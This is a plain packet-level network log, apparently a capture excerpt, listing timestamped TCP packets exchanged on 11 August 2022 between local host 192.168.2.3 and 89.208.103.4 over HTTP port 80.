Aug 11, 2022 06:57:08.817780972 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817806959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817816973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817845106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817856073 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817882061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817893028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817924023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817936897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.817961931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.817976952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818012953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818017960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818048954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818061113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818085909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818094969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818124056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818135977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818161011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818171024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818200111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818208933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818236113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818247080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818274021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818288088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818310976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818346024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818358898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818382978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818397999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818420887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818424940 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818458080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818495989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818511009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818533897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818543911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818572044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818609953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818645954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818655968 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818675041 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818684101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818711042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818721056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818733931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818758011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818795919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818809032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818833113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818840981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818870068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818907022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818923950 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818942070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818953037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.818980932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.818991899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819016933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819029093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819055080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819063902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819101095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819109917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819137096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819148064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819174051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819185019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819263935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819283009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819298983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819338083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819339037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819365978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819397926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819400072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819434881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819449902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819472075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819483995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819513083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819519043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819550037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819565058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819587946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819597006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819626093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819641113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819662094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819674015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819700003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819710970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819737911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819747925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819777012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819786072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819816113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819827080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819853067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819864035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819890976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819900036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819928885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819940090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.819967031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.819978952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.820004940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.820014000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.820041895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.820053101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.820080042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.820091009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.820117950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.820141077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.820153952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.820164919 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.820202112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.832957029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833031893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833060026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833093882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833128929 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833162069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833165884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833190918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833223104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833225965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833247900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833260059 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833280087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833295107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833308935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833329916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833343029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833363056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833374977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833396912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833409071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833431005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833444118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833466053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833475113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833501101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833513021 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833535910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833556890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833570004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833585024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833605051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833616018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833637953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833653927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833672047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833687067 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833705902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833718061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833739996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833751917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833775043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833786011 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833807945 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833822966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833842039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833851099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833875895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833889961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833909035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833923101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833942890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833954096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.833976030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.833991051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834009886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834022999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834047079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834057093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834079981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834091902 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834114075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834126949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834147930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834161043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834181070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834193945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834214926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834227085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834249020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834261894 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834283113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834294081 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834319115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834330082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834351063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834363937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834386110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.834405899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.834436893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855057955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855117083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855155945 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855190992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855216980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855225086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855230093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855230093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855232954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855268955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855293989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855307102 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855319977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855354071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855370998 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855418921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855434895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855472088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855480909 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855509996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855520964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855551958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855560064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855587959 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855598927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855626106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855633020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855664015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855673075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855700016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855709076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855737925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855743885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855776072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.855783939 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.855820894 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.856482983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.856522083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.856569052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.856579065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.856623888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.856662989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.856671095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.856698990 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.856708050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.856743097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861208916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861248970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861268997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861285925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861301899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861325026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861342907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861361980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861372948 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861399889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861407042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861437082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861445904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861474037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861485958 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861530066 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861665010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861702919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861715078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861740112 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861747980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861777067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.861840010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.861891985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.862281084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.862320900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.862334967 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.862358093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.862366915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.862395048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.862399101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.862441063 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.862737894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.862781048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.862792015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.862818003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.862852097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.862855911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.862878084 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.862901926 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.863282919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.863321066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.863341093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.863384962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.866425991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.866466999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.866503000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.866517067 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.866530895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.866538048 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.866543055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.866590023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.879709005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.879760027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.879776001 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.879817009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.880158901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.880197048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.880213022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.880234957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.880244017 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.880283117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.880724907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.880772114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.880776882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.880810976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.880836964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.880856991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.880875111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.880908012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.881253004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.881292105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.881313086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.881330013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.881342888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.881366968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.881381035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.881411076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.881753922 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.881794930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.881803989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.881830931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.881840944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.881867886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.881875038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.881915092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.882260084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.882298946 CEST	80	49736	89.208.103.4	192.168.2.3
